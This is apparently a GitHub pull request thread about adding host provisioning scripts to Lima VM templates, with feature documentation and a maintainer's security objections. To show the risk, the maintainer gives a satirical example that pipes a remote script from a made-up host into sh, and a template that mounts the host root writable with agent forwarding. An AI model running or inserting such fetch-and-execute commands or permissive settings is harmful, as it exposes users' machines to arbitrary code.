Add Host Provision to default.yaml
#2180
Conversation
|
The failing tests seem to be an issue with the build cache. 馃 |
norio-nomura
force-pushed
the
host-provision
branch
from
ba8f650
to
545e210
Compare
Fixed |
|
https://github.com/lima-vm/lima/actions/runs/7770635361/job/21191054495?pr=2180#step:9:20
Is this a temporary failure? |
|
|
I wish you would create an issue first to discuss a new feature, and how it is going to be implemented. I think we discussed host provisioning scripts before, and rejected the idea due to security considerations, but I couldn't find any issue or discussion related to it right now. Host provisioning scripts creating a Lima instance from a URL may now run arbitrary code on the user's machine: Now, installing remote templates without verifying them first is already somewhat dangerous: mounts:
- location: /
mountPoint: /mnt/host
writable: true
ssh:
forwardAgent: trueBut executing a provisioning script directly on the host also lets you run arbitrary other code, and gives you access to any unlocked keychains. Without this feature there is no mechanism that would allow a Lima instance to execute additional code on the host (afaik). If we agree on supporting host scripts at all, then I would like to see additional safeguards implemented: When a new instance is created with a host provisioning script in the template, $ limactl create https://example.com/vm.yaml
WARNING: The template includes a provisioning script that will run on your local machine!
? Do you want to run the script on your machine every time before the instance starts?There should be no default answer, and if running with I think it may be a good idea if the template could include a message for the host script, that would be displayed before the prompt: hostProvision:
- message: |
Do you feel lucky, punk?
Many exciting script actions, chosen at random:
* Buy a new NFT from your unlocked wallet
* Install remote access trojan
* Get free bitcoin
* Watch another user's webcam
* Encrypt your hard drive and pay ransom
Never have a boring day again!
script: "curl https://russion.roulette/script-of-the-day | sh"I have more feedback on the implementation details, but I would like to hear first what others @lima-vm/maintainers think about supporting host scripts at all.
From a risk/benefit point of view I would rather see #2159 implemented, but I do understand the appeal of the more powerful mechanism. I'm just afraid that it will be abused for remote code execution exploits. |
I've triggered a re-run. |
馃憤 |
I was going to suggest this (including adding the prompt), but it is outside the scope of this PR. We then need to add some additional options like |
|
I understand that Host Provision is a security issue when |
Host provisioning scripts are executed every time before starting the instance.
- the working directory is the instance directory `{{.Dir}}`
- the `runtime.GOOS` is used to determine the host OS. e.g. `darwin` for macOS, `linux` for Linux, and `windows` for Windows.
- if `wait` is true and the script exits with a non-zero status, the instance start will be aborted.
`shell` and `script` can include these template variables:
- `{{.ScriptName}}` that represents the temporary script file path.
- `{{.Index}}` that represents the index in the list of host provisioning scripts (0-based).
- template variables available in `limactl list --format` command.
馃煝 Builtin default: null
e.g.
```yaml
hostProvision:
- debug: false # change the temporary script location to {{.Dir}} and not delete it after execution. default: false
hostOS: darwin # string or []string. The script is executed only on the specified host OS.
script: | # passed to the shell as temporary file argument if exists
xattr -w com.apple.metadata:com_apple_backup_excludeItem true {{.Dir}}/{basedisk,diffdisk}
shell: bash # default: null
wait: true # wait for the script to finish before starting the instance. default: true
```
If no shell is given, the default shell is selected based on the host OS. If the default shell is not located on the PATH, fallbacks to `sh` (when host OS is not windows) or `powershell` (when host OS is windows).
`shell` can be either:
1. Builtin / Explicitly supported keywords
| Keyword | Command run internally | Description |
| ------------ | ------------------------------------------------------ | ---------------------------------------------- |
| `bash` | `bash --noprofile --norc -eo pipefail {{.ScriptName}}` | The default shell when host OS is not windows. |
| `sh` | `sh -e {{.ScriptName}}` | |
| `pwsh` | `pwsh -command ". '{{.ScriptName}}'"` | The default shell when host OS is windows. |
| `powershell` | `powershell -command ". '{{.ScriptName}}'"` | |
| `cmd` | `cmd /D /E:ON /V:OFF /S /C "CALL "{{.ScriptName}}""` | |
2. Template string: `command [...options] {{.ScriptName}} [...more_options]`
`{{.ScriptName}}` is replaced with the temporary script file path
there are shorthand forms for the builtin shells:
```yaml
- bash: echo "executed by bash" # interpreted as {shell: bash, hostOS: [darwin, linux], script: ...}
- sh: echo "executed by sh" # interpreted as {shell: sh, hostOS: [darwin, linux], script: ...}
- pwsh: Write-Host "executed by pwsh" # interpreted as {shell: pwsh, hostOS: [windows], script: ...}
- powershell: Write-Host "executed by powershell" # interpreted as {shell: powershell, hostOS: [windows], script: ...}
- cmd: echo "executed by cmd" # interpreted as {shell: cmd, hostOS: [windows], script: ...}
```
e.g.
```yaml
- bash: | # Post a notification when an error by the hostProvision script is detected
jq=/opt/homebrew/bin/jq && test -x $jq || exit 0
tail -n0 -F ha.stderr.log | while read -r line; do
msg=$(echo "$line"|$jq -er '
select(.hostProvision and .hostProvision != {{.Index}})| # select log lines from other hostProvision scripts
select(.level == "error")| # select error log lines
.msg
') || continue
osascript -e "on run argv" -e "display notification (item 1 of argv) with title \"Lima\"" -e "end run" "$msg"
echo Posted a notification
done
debug: false
hostOS: darwin
wait: false
```
This PR is an alternative solution to lima-vm#2159.
Signed-off-by: Norio Nomura <norio.nomura@gmail.com>
Add `WithEnableHostProvision()` option to `limayaml.Load()` and `limayaml.FillDefault()` to enable `HostProvision` in `lima.yaml` Signed-off-by: Norio Nomura <norio.nomura@gmail.com>
norio-nomura
force-pushed
the
host-provision
branch
from
a3834f0
to
1499fcc
Compare
|
Updated to the use of |
Signed-off-by: Norio Nomura <norio.nomura@gmail.com>
norio-nomura
force-pushed
the
host-provision
branch
from
0982c84
to
e01afe1
Compare
|
This PR (feature) seems like overkill to me, if it is only going to be used to exclude the lima directory from backup? We had similar feature requests for installing |
Host provisioning scripts are executed every time before starting the instance.
{{.Dir}}runtime.GOOSis used to determine the host OS. e.g.darwinfor macOS,linuxfor Linux, andwindowsfor Windows.waitis true and the script exits with a non-zero status, the instance start will be aborted.shellandscriptcan include these template variables:{{.ScriptName}}that represents the temporary script file path.{{.Index}}that represents the index in the list of host provisioning scripts (0-based).limactl list --formatcommand.馃煝 Builtin default: null
e.g.
If no shell is given, the default shell is selected based on the host OS. If the default shell is not located on the PATH, fallbacks to
sh(when host OS is not windows) orpowershell(when host OS is windows).shellcan be either:bashbash --noprofile --norc -eo pipefail {{.ScriptName}}shsh -e {{.ScriptName}}pwshpwsh -command ". '{{.ScriptName}}'"powershellpowershell -command ". '{{.ScriptName}}'"cmdcmd /D /E:ON /V:OFF /S /C "CALL "{{.ScriptName}}""command [...options] {{.ScriptName}} [...more_options]{{.ScriptName}}is replaced with the temporary script file paththere are shorthand forms for the builtin shells:
e.g.
This PR is an alternative solution to #2159.